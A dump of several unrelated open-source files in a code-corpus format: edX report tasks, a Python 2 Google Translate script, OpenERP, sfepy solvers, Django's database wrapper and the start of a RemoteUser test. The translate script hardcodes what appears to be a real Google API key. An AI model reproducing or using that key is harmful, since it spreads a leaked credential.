user__in=enrolled_students,
course_id=course_id,
status__in=certificate_statuses,
)
# Mark generated certificates as 'unavailable' and update download_url, download_uui, verify_uuid and
# grade with empty string for each row
certificates.update(
status=CertificateStatuses.unavailable,
verify_uuid='',
download_uuid='',
download_url='',
grade='',
)
def upload_ora2_data(
_xmodule_instance_args, _entry_id, course_id, _task_input, action_name
):
"""
Collect ora2 responses and upload them to S3 as a CSV
"""
start_date = datetime.now(UTC)
start_time = time()
num_attempted = 1
num_total = 1
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
task_progress = TaskProgress(action_name, num_total, start_time)
task_progress.attempted = num_attempted
curr_step = {'step': "Collecting responses"}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s for all submissions',
task_info_string,
action_name,
curr_step,
)
task_progress.update_task_state(extra_meta=curr_step)
try:
header, datarows = OraAggregateData.collect_ora2_data(course_id)
rows = [header] + [row for row in datarows]
# Update progress to failed regardless of error type
except Exception: # pylint: disable=broad-except
TASK_LOG.exception('Failed to get ORA data.')
task_progress.failed = 1
curr_step = {'step': "Error while collecting data"}
task_progress.update_task_state(extra_meta=curr_step)
return UPDATE_STATUS_FAILED
task_progress.succeeded = 1
curr_step = {'step': "Uploading CSV"}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s',
task_info_string,
action_name,
curr_step,
)
task_progress.update_task_state(extra_meta=curr_step)
upload_csv_to_report_store(rows, 'ORA_data', course_id, start_date)
curr_step = {'step': 'Finalizing ORA data report'}
task_progress.update_task_state(extra_meta=curr_step)
TASK_LOG.info(u'%s, Task type: %s, Upload complete.', task_info_string, action_name)
return UPDATE_STATUS_SUCCEEDED
|
agpl-3.0
|
andrewshadura/omim
|
tools/python/google_translate.py
|
53
|
1336
|
#!/usr/bin/python
import re
import sys
import urllib
import simplejson
import time
baseUrl = "http://www.googleapis.com/language/translate/v2"
def translate(text,src='en'):
targetLangs = ["ja", "fr", "ar", "de", "ru", "sv", "zh", "fi", "ko", "ka", "be", "nl", "ga", "el", "it", "es", "th", "ca", "cy", "hu", "sr", "fa", "eu", "pl", "uk", "sl", "ro", "sq", "cs", "sk", "af", "hr", "hy", "tr", "pt", "lt", "bg", "la", "et", "vi", "mk", "lv", "is", "hi"]
retText=''
for target in targetLangs:
params = ({'source': src,
'target': target,
'key': 'AIzaSyDD5rPHpqmeEIRVI34wYI1zMplMq9O_w2k'
})
translation = target + ':'
params['q'] = text
resp = simplejson.load(urllib.urlopen('%s' % (baseUrl), data = urllib.urlencode(params)))
print resp
try:
translation += resp['data']['translations']['translatedText']
except:
return retText
retText += '|' + translation
return retText
def test():
for line in sys.stdin:
line = line.rstrip('\n\r')
retText = 'en:' + line + translate(line)
print retText
if __name__=='__main__':
reload(sys)
sys.setdefaultencoding('utf-8')
try:
test()
except KeyboardInterrupt:
print "\n"
sys.exit(0)
|
apache-2.0
|
songmonit/CTTMSONLINE
|
addons/email_template/__init__.py
|
381
|
1144
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009 Sharoon Thomas
# Copyright (C) 2010-Today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import email_template
import wizard
import res_partner
import ir_actions
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
rc/sfepy
|
sfepy/solvers/optimize.py
|
4
|
13138
|
from __future__ import absolute_import
import numpy as nm
import numpy.linalg as nla
from sfepy.base.base import output, get_default, pause, Struct
from sfepy.base.log import Log, get_logging_conf
from sfepy.base.timing import Timer
from sfepy.solvers.solvers import OptimizationSolver
import scipy.optimize as sopt
import scipy.optimize.linesearch as linesearch
import six
from six.moves import range
def conv_test(conf, it, of, of0, ofg_norm=None):
"""
Returns
-------
flag : int
* -1 ... continue
* 0 ... small OF -> stop
* 1 ... i_max reached -> stop
* 2 ... small OFG -> stop
* 3 ... small relative decrase of OF
"""
status = -1
output('opt: iter: %d, of: %e (||ofg||: %e)' % (it, of, ofg_norm))
if (abs(of) < conf.eps_of):
status = 0
elif ofg_norm and (ofg_norm < conf.eps_ofg):
status = 2
elif (it > 0) and (abs(of0 - of) < (conf.eps_rd * abs(of0))):
status = 3
if (status == -1) and (it >= conf.i_max):
status = 1
return status
def wrap_function(function, args):
ncalls = [0]
times = []
timer = Timer()
def function_wrapper(x):
ncalls[0] += 1
timer.start()
out = function(x, *args)
times.append(timer.stop())
return out
return ncalls, times, function_wrapper
def check_gradient(xit, aofg, fn_of, delta, check):
dofg = nm.zeros_like(aofg)
xd = xit.copy()
for ii in range(xit.shape[0]):
xd[ii] = xit[ii] + delta
ofp = fn_of(xd)
xd[ii] = xit[ii] - delta
ofm = fn_of(xd)
xd[ii] = xit[ii]
dofg[ii] = 0.5 * (ofp - ofm) / delta
output('**********', ii, aofg[ii], dofg[ii])
diff = abs(aofg - dofg)
aux = nm.concatenate((aofg[:,nm.newaxis], dofg[:,nm.newaxis],
diff[:,nm.newaxis]), 1)
output(aux)
output(nla.norm(diff, nm.Inf))
aofg.tofile('aofg.txt', ' ')
dofg.tofile('dofg.txt', ' ')
diff.tofile('diff.txt', ' ')
if check == 2:
import pylab
pylab.plot(aofg)
pylab.plot(dofg)
pylab.legend(('analytical', 'finite difference'))
pylab.show()
pause('gradient checking done')
class FMinSteepestDescent(OptimizationSolver):
"""
Steepest descent optimization solver.
"""
name = 'opt.fmin_sd'
_parameters = [
('i_max', 'int', 10, False,
'The maximum number of iterations.'),
('eps_rd', 'float', 1e-5, False,
'The relative delta of the objective function.'),
('eps_of', 'float', 1e-4, False,
'The tolerance for the objective function.'),
('eps_ofg', 'float', 1e-8, False,
'The tolerance for the objective function gradient.'),
('norm', 'numpy norm', nm.Inf, False,
'The norm to be used.'),
('ls', 'bool', True, False,
'If True, use a line-search.'),
('ls_method', "{'backtracking', 'full'}", 'backtracking', False,
'The line-search method.'),
('ls_on', 'float', 0.99999, False,
"""Start the backtracking line-search by reducing the step, if
:math:`||f(x^i)|| / ||f(x^{i-1})||` is larger than `ls_on`."""),
('ls0', '0.0 < float < 1.0', 1.0, False,
'The initial step.'),
('ls_red', '0.0 < float < 1.0', 0.5, False,
'The step reduction factor in case of correct residual assembling.'),
('ls_red_warp', '0.0 < float < 1.0', 0.1, False,
"""The step reduction factor in case of failed residual assembling
(e.g. the "warp violation" error caused by a negative volume
element resulting from too large deformations)."""),
('ls_min', '0.0 < float < 1.0', 1e-5, False,
'The minimum step reduction factor.'),
('check', '0, 1 or 2', 0, False,
"""If >= 1, check the tangent matrix using finite differences. If 2,
plot the resulting sparsity patterns."""),
('delta', 'float', 1e-6, False,
r"""If `check >= 1`, the finite difference matrix is taken as
:math:`A_{ij} = \frac{f_i(x_j + \delta) - f_i(x_j - \delta)}{2
\delta}`."""),
('output', 'function', None, False,
"""If given, use it instead of :func:`output()
<sfepy.base.base.output()>` function."""),
('yscales', 'list of str', ['linear', 'log', 'log', 'linear'], False,
'The list of four convergence log subplot scales.'),
('log', 'dict or None', None, False,
"""If not None, log the convergence according to the configuration in
the following form: ``{'text' : 'log.txt', 'plot' : 'log.pdf'}``.
Each of the dict items can be None."""),
]
def __init__(self, conf, **kwargs):
OptimizationSolver.__init__(self, conf, **kwargs)
conf = self.conf
log = get_logging_conf(conf)
conf.log = log = Struct(name='log_conf', **log)
conf.is_any_log = (log.text is not None) or (log.plot is not None)
if conf.is_any_log:
self.log = Log([[r'$||\Psi||$'], [r'$||\nabla \Psi||$'],
[r'$\alpha$'], ['iteration']],
xlabels=['', '', 'all iterations', 'all iterations'],
yscales=conf.yscales,
is_plot=conf.log.plot is not None,
log_filename=conf.log.text,
formats=[['%.8e'], ['%.3e'], ['%.3e'], ['%d']])
else:
self.log = None
def __call__(self, x0, conf=None, obj_fun=None, obj_fun_grad=None,
status=None, obj_args=None):
conf = get_default(conf, self.conf)
obj_fun = get_default(obj_fun, self.obj_fun)
obj_fun_grad = get_default(obj_fun_grad, self.obj_fun_grad)
status = get_default(status, self.status)
obj_args = get_default(obj_args, self.obj_args)
if conf.output:
globals()['output'] = conf.output
output('entering optimization loop...')
nc_of, tt_of, fn_of = wrap_function(obj_fun, obj_args)
nc_ofg, tt_ofg, fn_ofg = wrap_function(obj_fun_grad, obj_args)
timer = Timer()
time_stats = {'of' : tt_of, 'ofg': tt_ofg, 'check' : []}
ofg = None
it = 0
xit = x0.copy()
while 1:
of = fn_of(xit)
if it == 0:
of0 = ofit0 = of_prev = of
of_prev_prev = of + 5000.0
if ofg is None:
ofg = fn_ofg(xit)
if conf.check:
timer.start()
check_gradient(xit, ofg, fn_of, conf.delta, conf.check)
time_stats['check'].append(timer.stop())
ofg_norm = nla.norm(ofg, conf.norm)
ret = conv_test(conf, it, of, ofit0, ofg_norm)
if ret >= 0:
break
ofit0 = of
##
# Backtrack (on errors).
alpha = conf.ls0
can_ls = True
while 1:
xit2 = xit - alpha * ofg
aux = fn_of(xit2)
if self.log is not None:
self.log(of, ofg_norm, alpha, it)
if aux is None:
alpha *= conf.ls_red_warp
can_ls = False
output('warp: reducing step (%f)' % alpha)
elif conf.ls and conf.ls_method == 'backtracking':
if aux < of * conf.ls_on: break
alpha *= conf.ls_red
output('backtracking: reducing step (%f)' % alpha)
else:
of_prev_prev = of_prev
of_prev = aux
break
if alpha < conf.ls_min:
if aux is None:
raise RuntimeError('giving up...')
output('linesearch failed, continuing anyway')
break
# These values are modified by the line search, even if it fails
of_prev_bak = of_prev
of_prev_prev_bak = of_prev_prev
if conf.ls and can_ls and conf.ls_method == 'full':
output('full linesearch...')
alpha, fc, gc, of_prev, of_prev_prev, ofg1 = \
linesearch.line_search(fn_of,fn_ofg,xit,
-ofg,ofg,of_prev,of_prev_prev,
c2=0.4)
if alpha is None: # line search failed -- use different one.
alpha, fc, gc, of_prev, of_prev_prev, ofg1 = \
sopt.line_search(fn_of,fn_ofg,xit,
-ofg,ofg,of_prev_bak,
of_prev_prev_bak)
if alpha is None or alpha == 0:
# This line search also failed to find a better
# solution.
ret = 3
break
output(' -> alpha: %.8e' % alpha)
else:
if conf.ls_method == 'full':
output('full linesearch off (%s and %s)'
% (conf.ls, can_ls))
ofg1 = None
if self.log is not None:
self.log.plot_vlines(color='g', linewidth=0.5)
xit = xit - alpha * ofg
if ofg1 is None:
ofg = None
else:
ofg = ofg1.copy()
for key, val in six.iteritems(time_stats):
if len(val):
output('%10s: %7.2f [s]' % (key, val[-1]))
it = it + 1
output('status: %d' % ret)
output('initial value: %.8e' % of0)
output('current value: %.8e' % of)
output('iterations: %d' % it)
output('function evaluations: %d in %.2f [s]'
% (nc_of[0], nm.sum(time_stats['of'])))
output('gradient evaluations: %d in %.2f [s]'
% (nc_ofg[0], nm.sum(time_stats['ofg'])))
if self.log is not None:
self.log(of, ofg_norm, alpha, it)
if conf.log.plot is not None:
self.log(save_figure=conf.log.plot, finished=True)
else:
self.log(finished=True)
if status is not None:
status['log'] = self.log
status['status'] = status
status['of0'] = of0
status['of'] = of
status['it'] = it
status['nc_of'] = nc_of[0]
status['nc_ofg'] = nc_ofg[0]
status['time_stats'] = time_stats
return xit
class ScipyFMinSolver(OptimizationSolver):
"""
Interface to SciPy optimization solvers scipy.optimize.fmin_*.
"""
name = 'nls.scipy_fmin_like'
_i_max_name = {
'fmin' : 'maxiter',
'fmin_bfgs' : 'maxiter',
'fmin_cg' : 'maxiter',
'fmin_cobyla' : 'maxfun',
'fmin_l_bfgs_b' : 'maxfun',
'fmin_ncg' : 'maxiter',
'fmin_powell' : 'maxiter',
'fmin_slsqp' : 'iter',
'fmin_tnc' : 'maxfun',
}
_has_grad = ('fmin_bfgs', 'fmin_cg', 'fmin_l_bfgs_b', 'fmin_ncg',
'fmin_slsqp', 'fmin_tnc')
_parameters = [
('method',
'{%s}' % ', '.join(sorted(repr(ii) for ii in _i_max_name.keys())),
'fmin', False,
'The actual optimization method to use.'),
('i_max', 'int', 10, False,
'The maximum number of iterations.'),
('*', '*', None, False,
'Additional parameters supported by the method.'),
]
def __init__(self, conf, **kwargs):
OptimizationSolver.__init__(self, conf, **kwargs)
self.set_method(self.conf)
def set_method(self, conf):
import scipy.optimize as so
try:
solver = getattr(so, conf.method)
except AttributeError:
raise ValueError('scipy solver %s does not exist!' % conf.method)
self.solver = solver
def __call__(self, x0, conf=None, obj_fun=None, obj_fun_grad=None,
status=None, obj_args=None):
import inspect
if conf is not None:
self.set_method(conf)
else:
conf = self.conf
obj_fun = get_default(obj_fun, self.obj_fun)
obj_fun_grad = get_default(obj_fun_grad, self.obj_fun_grad)
status = get_default(status, self.status)
obj_args = get_default(obj_args, self.obj_args)
timer = Timer(start=True)
kwargs = {self._i_max_name[conf.method] : conf.i_max,
'args' : obj_args}
if conf.method in self._has_grad:
kwargs['fprime'] = obj_fun_grad
if 'disp' in inspect.getargspec(self.solver)[0]:
kwargs['disp'] = conf.verbose
kwargs.update(self.build_solver_kwargs(conf))
out = self.solver(obj_fun, x0, **kwargs)
if status is not None:
status['time_stats'] = timer.stop()
return out
|
bsd-3-clause
|
frankvdp/django
|
django/db/backends/base/base.py
|
10
|
24014
|
import copy
import time
import warnings
from collections import deque
from contextlib import contextmanager
import _thread
import pytz
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DEFAULT_DB_ALIAS
from django.db.backends import utils
from django.db.backends.base.validation import BaseDatabaseValidation
from django.db.backends.signals import connection_created
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper
from django.utils import timezone
from django.utils.functional import cached_property
NO_DB_ALIAS = '__no_db__'
class BaseDatabaseWrapper:
"""Represent a database connection."""
# Mapping of Field objects to their column types.
data_types = {}
# Mapping of Field objects to their SQL suffix such as AUTOINCREMENT.
data_types_suffix = {}
# Mapping of Field objects to their SQL for CHECK constraints.
data_type_check_constraints = {}
ops = None
vendor = 'unknown'
display_name = 'unknown'
SchemaEditorClass = None
# Classes instantiated in __init__().
client_class = None
creation_class = None
features_class = None
introspection_class = None
ops_class = None
validation_class = BaseDatabaseValidation
queries_limit = 9000
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
allow_thread_sharing=False):
# Connection related attributes.
# The underlying database connection.
self.connection = None
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.settings_dict = settings_dict
self.alias = alias
# Query logging in debug mode or when explicitly enabled.
self.queries_log = deque(maxlen=self.queries_limit)
self.force_debug_cursor = False
# Transaction related attributes.
# Tracks if the connection is in autocommit mode. Per PEP 249, by
# default, it isn't.
self.autocommit = False
# Tracks if the connection is in a transaction managed by 'atomic'.
self.in_atomic_block = False
# Increment to generate unique savepoint ids.
self.savepoint_state = 0
# List of savepoints created by 'atomic'.
self.savepoint_ids = []
# Tracks if the outermost 'atomic' block should commit on exit,
# ie. if autocommit was active on entry.
self.commit_on_exit = True
# Tracks if the transaction should be rolled back to the next
# available savepoint because of an exception in an inner block.
self.needs_rollback = False
# Connection termination related attributes.
self.close_at = None
self.closed_in_transaction = False
self.errors_occurred = False
# Thread-safety related attributes.
self.allow_thread_sharing = allow_thread_sharing
self._thread_ident = _thread.get_ident()
# A list of no-argument functions to run when the transaction commits.
# Each entry is an (sids, func) tuple, where sids is a set of the
# active savepoint IDs when this function was registered.
self.run_on_commit = []
# Should we run the on-commit hooks the next time set_autocommit(True)
# is called?
self.run_commit_hooks_on_set_autocommit_on = False
# A stack of wrappers to be invoked around execute()/executemany()
# calls. Each entry is a function taking five arguments: execute, sql,
# params, many, and context. It's the function's responsibility to
# call execute(sql, params, many, context).
self.execute_wrappers = []
self.client = self.client_class(self)
self.creation = self.creation_class(self)
self.features = self.features_class(self)
self.introspection = self.introspection_class(self)
self.ops = self.ops_class(self)
self.validation = self.validation_class(self)
def ensure_timezone(self):
"""
Ensure the connection's timezone is set to `self.timezone_name` and
return whether it changed or not.
"""
return False
@cached_property
def timezone(self):
"""
Time zone for datetimes stored as naive values in the database.
Return a tzinfo object or None.
This is only needed when time zone support is enabled and the database
doesn't support time zones. (When the database supports time zones,
the adapter handles aware datetimes so Django doesn't need to.)
"""
if not settings.USE_TZ:
return None
elif self.features.supports_timezones:
return None
elif self.settings_dict['TIME_ZONE'] is None:
return timezone.utc
else:
return pytz.timezone(self.settings_dict['TIME_ZONE'])
@cached_property
def timezone_name(self):
"""
Name of the time zone of the database connection.
"""
if not settings.USE_TZ:
return settings.TIME_ZONE
elif self.settings_dict['TIME_ZONE'] is None:
return 'UTC'
else:
return self.settings_dict['TIME_ZONE']
@property
def queries_logged(self):
return self.force_debug_cursor or settings.DEBUG
@property
def queries(self):
if len(self.queries_log) == self.queries_log.maxlen:
warnings.warn(
"Limit for query logging exceeded, only the last {} queries "
"will be returned.".format(self.queries_log.maxlen))
return list(self.queries_log)
# ##### Backend-specific methods for creating connections and cursors #####
def get_connection_params(self):
"""Return a dict of parameters suitable for get_new_connection."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')
def get_new_connection(self, conn_params):
"""Open a connection to the database."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')
def init_connection_state(self):
"""Initialize the database connection settings."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')
def create_cursor(self, name=None):
"""Create a cursor. Assume that a connection is established."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')
# ##### Backend-specific methods for creating connections #####
def connect(self):
"""Connect to the database. Assume that the connection is closed."""
# Check for invalid configurations.
self.check_settings()
# In case the previous connection was closed while in an atomic block
self.in_atomic_block = False
self.savepoint_ids = []
self.needs_rollback = False
# Reset parameters defining when to close the connection
max_age = self.settings_dict['CONN_MAX_AGE']
self.close_at = None if max_age is None else time.time() + max_age
self.closed_in_transaction = False
self.errors_occurred = False
# Establish the connection
conn_params = self.get_connection_params()
self.connection = self.get_new_connection(conn_params)
self.set_autocommit(self.settings_dict['AUTOCOMMIT'])
self.init_connection_state()
connection_created.send(sender=self.__class__, connection=self)
self.run_on_commit = []
def check_settings(self):
if self.settings_dict['TIME_ZONE'] is not None:
if not settings.USE_TZ:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because USE_TZ is "
"False." % self.alias)
elif self.features.supports_timezones:
raise ImproperlyConfigured(
"Connection '%s' cannot set TIME_ZONE because its engine "
"handles time zones conversions natively." % self.alias)
def ensure_connection(self):
"""Guarantee that a connection to the database is established."""
if self.connection is None:
with self.wrap_database_errors:
self.connect()
# ##### Backend-specific wrappers for PEP-249 connection methods #####
def _prepare_cursor(self, cursor):
"""
Validate the connection is usable and perform database cursor wrapping.
"""
self.validate_thread_sharing()
if self.queries_logged:
wrapped_cursor = self.make_debug_cursor(cursor)
else:
wrapped_cursor = self.make_cursor(cursor)
return wrapped_cursor
def _cursor(self, name=None):
self.ensure_connection()
with self.wrap_database_errors:
return self._prepare_cursor(self.create_cursor(name))
def _commit(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.rollback()
def _close(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.close()
# ##### Generic wrappers for PEP-249 connection methods #####
def cursor(self):
"""Create a cursor, opening a connection if necessary."""
return self._cursor()
def commit(self):
"""Commit a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._commit()
# A successful commit means that the database connection works.
self.errors_occurred = False
self.run_commit_hooks_on_set_autocommit_on = True
def rollback(self):
"""Roll back a transaction and reset the dirty flag."""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._rollback()
# A successful rollback means that the database connection works.
self.errors_occurred = False
self.needs_rollback = False
self.run_on_commit = []
def close(self):
"""Close the connection to the database."""
self.validate_thread_sharing()
self.run_on_commit = []
# Don't call validate_no_atomic_block() to avoid making it difficult
# to get rid of a connection in an invalid state. The next connect()
# will reset the transaction state anyway.
if self.closed_in_transaction or self.connection is None:
return
try:
self._close()
finally:
if self.in_atomic_block:
self.closed_in_transaction = True
self.needs_rollback = True
else:
self.connection = None
# ##### Backend-specific savepoint management methods #####
def _savepoint(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
with self.cursor() as cursor:
cursor.execute(self.ops.savepoint_commit_sql(sid))
def _savepoint_allowed(self):
# Savepoints cannot be created outside a transaction
return self.features.uses_savepoints and not self.get_autocommit()
# ##### Generic savepoint management methods #####
def savepoint(self):
"""
Create a savepoint inside the current transaction. Return an
identifier for the savepoint that will be used for the subsequent
rollback or commit. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
thread_ident = _thread.get_ident()
tid = str(thread_ident).replace('-', '')
self.savepoint_state += 1
sid = "s%s_x%d" % (tid, self.savepoint_state)
self.validate_thread_sharing()
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Roll back to a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_rollback(sid)
# Remove any callbacks registered while this savepoint was active.
self.run_on_commit = [
(sids, func) for (sids, func) in self.run_on_commit if sid not in sids
]
def savepoint_commit(self, sid):
"""
Release a savepoint. Do nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_commit(sid)
def clean_savepoints(self):
"""
Reset the counter used to generate unique savepoint ids in this thread.
"""
self.savepoint_state = 0
# ##### Backend-specific transaction management methods #####
def _set_autocommit(self, autocommit):
"""
Backend-specific implementation to enable or disable autocommit.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')
# ##### Generic transaction management methods #####
def get_autocommit(self):
"""Get the autocommit state."""
self.ensure_connection()
return self.autocommit
def set_autocommit(self, autocommit, force_begin_transaction_with_broken_autocommit=False):
"""
Enable or disable autocommit.
The usual way to start a transaction is to turn autocommit off.
SQLite does not properly start a transaction when disabling
autocommit. To avoid this buggy behavior and to actually enter a new
transaction, an explcit BEGIN is required. Using
force_begin_transaction_with_broken_autocommit=True will issue an
explicit BEGIN with SQLite. This option will be ignored for other
backends.
"""
self.validate_no_atomic_block()
self.ensure_connection()
start_transaction_under_autocommit = (
force_begin_transaction_with_broken_autocommit and not autocommit and
hasattr(self, '_start_transaction_under_autocommit')
)
if start_transaction_under_autocommit:
self._start_transaction_under_autocommit()
else:
self._set_autocommit(autocommit)
self.autocommit = autocommit
if autocommit and self.run_commit_hooks_on_set_autocommit_on:
self.run_and_clear_commit_hooks()
self.run_commit_hooks_on_set_autocommit_on = False
def get_rollback(self):
"""Get the "needs rollback" flag -- for *advanced use* only."""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
return self.needs_rollback
def set_rollback(self, rollback):
"""
Set or unset the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
self.needs_rollback = rollback
def validate_no_atomic_block(self):
"""Raise an error if an atomic block is active."""
if self.in_atomic_block:
raise TransactionManagementError(
"This is forbidden when an 'atomic' block is active.")
def validate_no_broken_transaction(self):
if self.needs_rollback:
raise TransactionManagementError(
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block.")
# ##### Foreign key constraints checks handling #####
@contextmanager
def constraint_checks_disabled(self):
"""
Disable foreign key constraint checking.
"""
disabled = self.disable_constraint_checking()
try:
yield
finally:
if disabled:
self.enable_constraint_checking()
def disable_constraint_checking(self):
"""
Backends can implement as needed to temporarily disable foreign key
constraint checking. Should return True if the constraints were
disabled and will need to be reenabled.
"""
return False
def enable_constraint_checking(self):
"""
Backends can implement as needed to re-enable foreign key constraint
checking.
"""
pass
def check_constraints(self, table_names=None):
"""
Backends can override this method if they can apply constraint
checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
IntegrityError if any invalid foreign key references are encountered.
"""
pass
# ##### Connection termination handling #####
def is_usable(self):
"""
Test if the database connection is usable.
This method may assume that self.connection is not None.
Actual implementations should take care not to raise exceptions
as that may prevent Django from recycling unusable connections.
"""
raise NotImplementedError(
"subclasses of BaseDatabaseWrapper may require an is_usable() method")
def close_if_unusable_or_obsolete(self):
"""
Close the current connection if unrecoverable errors have occurred
or if it outlived its maximum age.
"""
if self.connection is not None:
# If the application didn't restore the original autocommit setting,
# don't take chances, drop the connection.
if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
self.close()
return
# If an exception other than DataError or IntegrityError occurred
# since the last commit / rollback, check if the connection works.
if self.errors_occurred:
if self.is_usable():
self.errors_occurred = False
else:
self.close()
return
if self.close_at is not None and time.time() >= self.close_at:
self.close()
return
# ##### Thread safety handling #####
def validate_thread_sharing(self):
"""
Validate that the connection isn't accessed by another thread than the
one which originally created it, unless the connection was explicitly
authorized to be shared between threads (via the `allow_thread_sharing`
property). Raise an exception if the validation fails.
"""
if not (self.allow_thread_sharing or self._thread_ident == _thread.get_ident()):
raise DatabaseError(
"DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, _thread.get_ident())
)
# ##### Miscellaneous #####
def prepare_database(self):
"""
Hook to do any database check or preparation, generally called before
migrating a project or an app.
"""
pass
@cached_property
def wrap_database_errors(self):
"""
Context manager and decorator that re-throws backend-specific database
exceptions using Django's common wrappers.
"""
return DatabaseErrorWrapper(self)
def chunked_cursor(self):
"""
Return a cursor that tries to avoid caching in the database (if
supported by the database), otherwise return a regular cursor.
"""
return self.cursor()
def make_debug_cursor(self, cursor):
"""Create a cursor that logs all queries in self.queries_log."""
return utils.CursorDebugWrapper(cursor, self)
def make_cursor(self, cursor):
"""Create a cursor without debug logging."""
return utils.CursorWrapper(cursor, self)
@contextmanager
def temporary_connection(self):
"""
Context manager that ensures that a connection is established, and
if it opened one, closes it to avoid leaving a dangling connection.
This is useful for operations outside of the request-response cycle.
Provide a cursor: with self.temporary_connection() as cursor: ...
"""
must_close = self.connection is None
try:
with self.cursor() as cursor:
yield cursor
finally:
if must_close:
self.close()
@property
def _nodb_connection(self):
"""
Return an alternative connection to be used when there is no need to
access the main database, specifically for test db creation/deletion.
This also prevents the production database from being exposed to
potential child threads while (or after) the test database is destroyed.
Refs #10868, #17786, #16969.
"""
return self.__class__(
{**self.settings_dict, 'NAME': None},
alias=NO_DB_ALIAS,
allow_thread_sharing=False,
)
def schema_editor(self, *args, **kwargs):
"""
Return a new instance of this backend's SchemaEditor.
"""
if self.SchemaEditorClass is None:
raise NotImplementedError(
'The SchemaEditorClass attribute of this database wrapper is still None')
return self.SchemaEditorClass(self, *args, **kwargs)
def on_commit(self, func):
if self.in_atomic_block:
# Transaction in progress; save for execution on commit.
self.run_on_commit.append((set(self.savepoint_ids), func))
elif not self.get_autocommit():
raise TransactionManagementError('on_commit() cannot be used in manual transaction management')
else:
# No transaction in progress and in autocommit mode; execute
# immediately.
func()
def run_and_clear_commit_hooks(self):
self.validate_no_atomic_block()
current_run_on_commit = self.run_on_commit
self.run_on_commit = []
while current_run_on_commit:
sids, func = current_run_on_commit.pop(0)
func()
@contextmanager
def execute_wrapper(self, wrapper):
"""
Return a context manager under which the wrapper is applied to suitable
database query executions.
"""
self.execute_wrappers.append(wrapper)
try:
yield
finally:
self.execute_wrappers.pop()
def copy(self, alias=None, allow_thread_sharing=None):
"""
Return a copy of this connection.
For tests that require two connections to the same database.
"""
settings_dict = copy.deepcopy(self.settings_dict)
if alias is None:
alias = self.alias
if allow_thread_sharing is None:
allow_thread_sharing = self.allow_thread_sharing
return type(self)(settings_dict, alias, allow_thread_sharing)
|
bsd-3-clause
|
nthiep/global-ssh-server
|
lib/python2.7/site-packages/django/contrib/auth/tests/remote_user.py
|
9
|
8779
|
from datetime import datetime
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.test import TestCase
from django.utils import timezone
@skipIfCustomUser
class RemoteUserTest(TestCase):
urls = 'django.contrib.auth.tests.urls'
middleware = 'django.contrib.auth.middleware.RemoteUserMiddleware'
backend = 'django.contrib.auth.backends.RemoteUserBackend'
# Usernames to be passed in REMOTE_USER for the test_known_user test case.
known_user = 'knownuser'
known_user2 = 'knownuser2'
def setUp(self):
self.curr_middleware = settings.MIDDLEWARE_CLASSES
self.curr_auth = settings.AUTHENTICATION_BACKENDS
settings.MIDDLEWARE_CLASSES += (self.middleware,)
settings.AUTHENTICATION_BACKENDS += (self.backend,)
def test_no_remote_user(self):
"""
Tests requests where no remote user is specified and insures that no
users get created.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/')
